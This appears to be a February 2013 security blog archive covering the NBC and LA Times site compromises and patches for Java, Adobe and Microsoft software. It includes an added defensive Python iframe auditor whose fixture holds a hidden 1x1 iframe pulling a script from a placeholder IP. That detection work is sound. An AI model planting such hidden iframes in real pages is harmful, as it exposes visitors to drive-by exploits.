Archive for February, 2013

NBC website serving malware – stay away!

February 21, 2013
NBC’s website has been compromised, and is redirecting users to malicious sites, reports Dancho Danchev.

According to HitmanPro, the website has been injected with malicious iFrames that lead to one of several compromised sites equipped with Java and PDF exploits.

It seems that upon successful exploitation of one of the vulnerabilities, the users are saddled with variants of the Citadel info-stealing Trojan that currently aren’t detected by many AV solutions.

The server with which the malware communicates has already been sinkholed. Nevertheless, if you have visited the news outlet’s website today and your AV hasn’t picked up on anything, double check with a different one, preferably one of those that currently detect these variants.

Visiting the NBC’s website is, for the time being, still dangerous, and even Facebook has moved to protect its users by not allowing the posting of the site’s URL.

Danchev has tied the campaign with two previous email ones that impersonated Facebook and Verizon.
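The NBC and LA Times compromises described on this page both hinge on iframes injected into otherwise legitimate pages that silently pull in an exploit-kit landing page. The following is an added example (not code from the original posts or from any of the vendors named) of a small defender-side check that scans a page's HTML for the classic markers of such an injection: an off-site host, a near-zero frame size, or a style that hides the frame. The sample page, the site host name and the 203.0.113.7 address are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: one legitimate embed, one injected hidden off-site frame.
SAMPLE_HTML = """
<html><body><h1>Headline</h1>
<iframe src="https://video.example-news.test/player?id=42" width="640" height="360"></iframe>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""

def _tiny(value):
    # A width/height of 0-2 pixels is a classic marker of a frame meant to be invisible.
    if value is None:
        return False
    digits = ''.join(ch for ch in value if ch.isdigit())
    return digits != '' and int(digits) <= 2

class IframeAuditor(HTMLParser):
    """Collect each iframe together with the reasons it looks injected."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != 'iframe':
            return
        a = dict(attrs)
        src = a.get('src') or ''
        reasons = []
        host = urlparse(src).hostname or ''
        # Frames that point off-site (not the site itself or one of its subdomains).
        if host and host != self.site_host and not host.endswith('.' + self.site_host):
            reasons.append('off-site host ' + host)
        if _tiny(a.get('width')) or _tiny(a.get('height')):
            reasons.append('near-zero size')
        style = (a.get('style') or '').replace(' ', '').lower()
        if 'display:none' in style or 'visibility:hidden' in style:
            reasons.append('hidden by style')
        if reasons:
            self.findings.append((src, reasons))

def audit_iframes(html, site_host):
    """Return [(src, [reason, ...]), ...] for iframes that deserve a closer look."""
    p = IframeAuditor(site_host)
    p.feed(html)
    return p.findings
```

Running `audit_iframes(SAMPLE_HTML, 'example-news.test')` reports only the second frame, with all three reasons; a frame that is both off-site and hidden is the pattern worth escalating.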


Critical Security Updates for Adobe Reader, Java

February 20, 2013

Adobe and Oracle each released updates to fix critical security holes in their software. Adobe’s patch plugs two zero-day holes that hackers have been using to break into computers via Adobe Reader and Acrobat. Separately, Oracle issued updates to correct at least five security issues with Java.

The Java update comes amid revelations by Apple, Facebook and Twitter that employees at these organizations were hacked using exploits that attacked Java vulnerabilities on Mac and Windows machines. According to Bloomberg News, at least 40 companies were targeted in malware attacks linked to an Eastern European gang of hackers that has been trying to steal corporate secrets.

Oracle’s update brings Java on Windows systems to Java SE 7 Update 15, and Java 6 Update 41. Most consumers can get by without Java installed, or at least not plugged into the browser. Because of the prevalence of threats targeting Java installations, I’d urge these users to remove Java or unplug it from the browser. If this is too much trouble, consider adopting a dual-browser approach, keeping Java unplugged from your main browser, and plugged in to a secondary browser that you only use to visit sites that require the plugin. To find out if you have Java installed, visit and click the “Do I have Java?” link below the big red button. Existing users can update Java from the Java Control Panel by clicking the Update tab and then the “Update Now” button.

Apple has issued an update that brings Java up-to-date on security patches but also disables the Java plugin from Web browsers on the system. Apple also issued a malware removal tool that it said should remove from Macs the most common variants of malware that used the most recent Java exploits.

Adobe’s update brings Reader XI to version 11.0.2 and Reader X to v. 10.1.6 on both Mac and Windows (see the graphic below for other versions). This patch fixes a couple of critical flaws that Adobe said last week hackers were exploiting to break into vulnerable systems.


Finally, Firefox users may be happy to know that the newest version of the browser now includes its own PDF viewer. According to, Firefox 19 “includes PDF.js, a JavaScript library intended to convert PDF files into HTML5, which was started by Andreas Gal and Chris Jones as a research project that eventually picked up steam within Mozilla Labs. Technically, the tool has been in Firefox for many versions, but you had to manually enable it. The whole point of the built-in PDF viewer is to avoid having to use plugins with proprietary closed source code “that could potentially expose users to security vulnerabilities,” according to Mozilla. It also cuts down on extra bloat that Firefox can already do: PDF viewing plugins have their own code for drawing images and text.”

This is why you need to keep up with your software updates!

February 14, 2013
LA Times website redirected users to exploit kit for over six weeks
A sub-domain of Los Angeles Times’ website has been redirecting visitors to compromised websites hosting the latest version of the Blackhole exploit kit for over six weeks (since Dec. 23, 2012), says Brian Krebs, and estimates that some 325,000 visitors were exposed to the attack.
Alerted to the fact that something was wrong with by some of its readers, he investigated the matter with the help of Avast’s director of threat intelligence Jindrich Kubec, who checked it and confirmed that the tips were, indeed, true and correct.

When first contacted, LA Times spokeswoman Hillary Manning stated that the problem was tied to the recent hack of the NetSeer advertising network site, which resulted in Google blocking popular third-party sites – among them the New York Times, the Washington Post, ZDNet and the LA Times – that were serving ads provided by the ad network. She claimed that the problem had been solved and that there were no additional ones.

Unfortunately for the publication, that was not true, as Avast and other security companies continued to detect exploits coming from the sub-domain. In a statement released a few hours later, the LA Times conceded that the security companies’ readings were accurate, and that they resolved the situation.

“On February 6th the Los Angeles Times was made aware that malware was possibly being served by We quickly determined the problem was contained within the Offers & Deals sub-domain, which is maintained by a third party,” they stated.

“Our forensics team undertook what is now an ongoing investigation and is working closely with the vendor to collect evidence surrounding the event. To ensure safety, the Offers & Deals platform has been rebuilt and further secured. The sub-domain generates only advertising content and does not contain any customer information. As a trusted source of news and information, The Times takes matters of internet security very seriously and is pleased to report that there is no malware currently detectable on Offers & Deals.”

Fat Tuesday Patch

February 12, 2013

Adobe and Microsoft each have issued security updates to fix multiple critical vulnerabilities in their products. Adobe released updates for Flash Player, AIR and Shockwave; Microsoft pushed out a dozen patches addressing at least 57 security holes in Windows, Office, Internet Explorer, Exchange and .NET Framework.

Five of the 12 patches Microsoft released today earned its most dire “critical” label, meaning these updates fix vulnerabilities that attackers or malware could exploit to seize complete control over a PC with no help from users.

Thirteen of the 57 bugs squashed in Microsoft’s patch batch address issues with Internet Explorer; other critical patches fix problems in the Windows implementation of Vector Markup Language (VML), Microsoft Exchange, and flaws in the way Windows handles certain media files. The remaining critical patch fixes a flaw that is present only on Windows XP systems.

Updates are available via Windows Update or from Automatic Update. A note about applying these Windows patches: Today’s batch includes an update for .NET, which in my experience should be applied separately. In nearly every case where I’ve experienced problems updating Windows, a huge .NET patch somehow gummed up the works. Consider applying the rest of the patches first, rebooting, and then installing the .NET update, if your system requires it.

And for the second time in a week, Adobe has released an update for its Flash Player software. This one addresses at least 17 distinct vulnerabilities; unlike last week’s emergency Flash update, this one thankfully doesn’t address flaws that are already actively being exploited, according to Adobe. Check the graphic below for the most recent version that includes the updates relevant to your operating system. This link should tell you which version of Flash your browser has installed. The most recent versions are available from the Adobe download center, but beware of potentially unwanted add-ons (like McAfee Security Scan). To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

(Graphic: Adobe Flash Player 11.6.602 version table)

Chrome and Internet Explorer 10 have built-in auto-update features that should bring Flash to the most recent version. The patched version of Flash for Chrome is 11.6.602.167, which Google pushed out today. Windows users who browse the Web with anything other than Internet Explorer will need to apply this patch twice, once with IE and again using the alternative browser (e.g. Firefox or Opera).

As Adobe does every time it releases a Flash update, it has released a fix for Adobe AIR. If you have that software installed, it can be updated from this link.

Finally, as the graphic above indicates, a fix for Adobe’s Shockwave Player is available that fixes at least two flaws. The latest version of Shockwave is, available here.  You can find the new version and an accounting of whether you have this program installed and its current version from this page. If you have this program installed update it; if that page offers a download, you don’t have Shockwave installed and probably don’t need it.

Windows and OS X users under attack, update Flash now!

February 8, 2013

Adobe has pushed out an emergency Flash update that solves two critical vulnerabilities (CVE-2013-0633 and CVE-2013-0634) that are being actively exploited to target Windows and OS X users, and is urging users to implement it as soon as possible.

According to a security bulletin released on Thursday, the OS X exploit targets Flash Player in Firefox or Safari via malicious Flash content hosted on websites, while Windows users are targeted with Microsoft Word documents, delivered as email attachments, that contain malicious Flash content.

Adobe has also announced its intention of adding new protections against malicious Flash content embedded in Microsoft Office documents to its next feature release of Flash Player.

“To protect users of Office 2008 and earlier, the upcoming release of Flash Player will determine whether Flash Player is being launched within Microsoft Office and check the version of Office. If Flash Player is launched within a version prior to Office 2010, Flash Player will prompt the end-user before executing the Flash content,” explained Peleus Uhley, Adobe’s platform security strategist.

“Therefore, if an end-user opens a document containing malicious Flash content, the malicious content will not immediately execute and impact the end-user. This extra step requires attackers to integrate a new level of social engineering that was previously not required.”

Users who have not enabled automatic updating of Flash can get their updates here or use the in-built updater in the Windows Control Panel or OS X System Preferences.

As a side note – I wonder if Mozilla is now reevaluating its recent decision to enable “Click to Play” in future Firefox releases for all versions of all plugins except the current version of Flash?

In the meantime, FireEye researchers have examined the payload executed as a part of the above mentioned attacks spotted in the wild, and have discovered that “even though the contents of Word files are in English, the codepage of Word files are ‘Windows Simplified Chinese (PRC, Singapore)’,” which might explain the origin of the attacks.

“One of the dropped executable files is digitally signed with an invalid certificate from MGAME Corporation, a Korean gaming company. The same executable renames itself to try to pass itself off as the Google update process,” they shared.

The malware ensures its persistence on infected computers by adding startup registry entries, checks for installed AV products, and then establishes contact with its C&C server.

Critical Java Update Fixes 50 Security Holes

February 3, 2013

Oracle Corp. has issued an update for its Java SE software that plugs at least 50 security holes in the software, including one the company said was actively being exploited in the wild.

The original Critical Patch Update for Java SE – February 2013 had been scheduled to be released on February 19th, but Oracle said it decided to accelerate the release of this update because of active exploitation in the wild of one of the vulnerabilities.

“Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply…fixes as soon as possible,” the company wrote in an advisory.

I couldn’t find a definitive account of which zero-day vulnerability in Java had caused Oracle to move up its patch schedule, but recently researchers have uncovered flaws in a mechanism that the company shipped with the previous version of Java that was designed to thwart attacks on the program. With Java 7 Update 10, Oracle introduced a mechanism that would require users to manually allow the execution of Java code not digitally signed by a trusted authority. Some security experts praised Oracle for adding the feature because it promised to drastically reduce the success of attacks that exploit security bugs in Java, but researchers have shown that the new feature can be easily bypassed.


The latest versions, Java 7 Update 13 and Java 6 Update 39, are available either through the updater built into Java (accessible from the Windows control panel), or by visiting. If you’re not sure which version you have or whether you’ve got the program installed at all, click the “Do I have Java” link below the red download button on the homepage.

Most end users who have Java on their systems probably don’t need it and can safely remove it (this advice does not scale for users of corporate systems, which may have specific applications that rely on Java). This is a buggy program that seems to produce a reliable stream of zero-day exploit opportunities for malware writers. So, if you don’t need it, junk it.

If you do need it, unplug it from the browser unless and until you need it. Starting with Java 7 Update 10, it is possible to disable Java content in web browsers through the Java control panel applet. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Apple has been taking steps to block Java on OS X systems when new unpatched vulnerabilities have been detected. According to MacRumors, for the second time in a month, Apple blacklisted the current version of the Java Web plugin on OS X, using the “Xprotect” anti-malware system built into OS X to enforce a minimum version number that had yet to be released. However, now writes that Java 7 Update 13 for Mac OS X brings Java on the Mac to the correct version number enforced by Xprotect, meaning Mac users who need Java can use it again without having to monkey with Terminal command-line workarounds.

This is the final set of updates for Java 6 – Oracle is phasing it out and has already taken steps to begin migrating Java 6 users to Java 7. Overall, this is probably a good thing. Lawrence Garvin, the self-described “head geek” at Austin, Texas based network management and monitoring firm SolarWinds, said that while media attention to Java 7’s security issues may be influencing the decision by some organizations to delay upgrading their Java 6 installations, only 18 of the security issues identified since Java 7’s release are unique to Java 7.

“Of the 84 vulnerabilities identified since Java 7’s release, we found that 66 of these existed in Java 6, while 40 existed in Java 5,” Garvin said. “Press coverage around Java 7’s security issues may be influencing some organizations to fail to upgrade their Java 6 installations to Java 7, thinking that Java 7 is flawed, when in fact the entire core of the Java platform has vulnerabilities. Oracle has announced that no new updates will be forthcoming for Java 6 after February 2013, so that any additional vulnerability discovered in Java 7 – and also existing in Java 6 – will never be patched.”